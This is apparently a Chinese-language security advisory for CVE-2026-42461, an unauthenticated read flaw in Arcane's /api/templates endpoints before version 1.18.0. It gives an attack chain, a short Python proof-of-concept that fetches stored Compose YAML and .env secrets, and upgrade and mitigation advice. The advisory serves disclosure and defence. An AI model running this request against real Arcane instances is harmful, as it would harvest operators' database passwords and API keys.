CVE-2026-42461 CVSS 7.5 高危

CVE-2026-42461 Arcane未授权访问漏洞

披露日期: 2026-05-09

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-42461

漏洞类型

未授权访问

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Arcane

漏洞概述

Arcane是一个用于管理Docker容器、镜像等的接口。在1.18.0版本之前，其后端Huma的四个/api/templates*端点未设置安全要求，允许未经身份验证的网络客户端读取实例中存储的所有自定义模板的完整Compose YAML和.env内容。由于Arcane的UI会在项目创建时保存包含真实环境变量（如数据库密码、API密钥）的模板，该漏洞导致攻击者无需认证即可获取操作员的敏感信息，而非仅仅是理论上的信息泄露。

技术细节

该漏洞的根源在于Arcane后端Huma框架中对特定API端点的安全配置错误。受影响版本中，位于/api/templates*路径下的四个GET接口在注册时未应用任何安全验证机制，这与前端代码中将该路径标记为受保护区域的逻辑不一致。同一路径下的POST、PUT和DELETE等CRUD操作均正确要求了Bearer Token或API Key认证，唯独GET请求被遗漏。攻击者利用这一差异，无需任何凭证即可向这些端点发送HTTP GET请求。由于Arcane允许用户将包含敏感配置（如数据库密码、第三方API密钥）的项目“另存为模板”，攻击者通过遍历这些端点，可以直接下载并解析YAML配置文件和环境变量文件，从而获取高敏感度的运维凭证。

攻击链分析

STEP 1

1. 信息收集

攻击者扫描网络或通过搜索引擎发现目标主机运行的是Arcane应用。

STEP 2

2. 漏洞探测

攻击者直接向目标发送未经身份验证的GET请求至/api/templates路径。

STEP 3

3. 数据窃取

服务器返回所有模板的YAML和.env文件内容，攻击者从中提取数据库密码、API密钥等敏感信息。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target configuration
target_host = "http://localhost:3000" # Replace with the actual target
vulnerable_endpoint = "/api/templates"

# Exploit: Send unauthenticated GET request
url = f"{target_host}{vulnerable_endpoint}"
try:
    response = requests.get(url, timeout=5)
    if response.status_code == 200:
        print("[+] Vulnerability Exploited Successfully!")
        print("[+] Leaked Template Data:")
        print(response.json())
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"[!] Error: {e}")

影响范围

Arcane < 1.18.0

防御指南

临时缓解措施

建议立即升级Arcane至1.18.0或更高版本以修复此漏洞。如果无法立即升级，应在网络边界（如防火墙或反向代理）处限制对/api/templates路径的访问，仅允许受信任的内部IP访问，或暂时停止服务直到完成升级。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表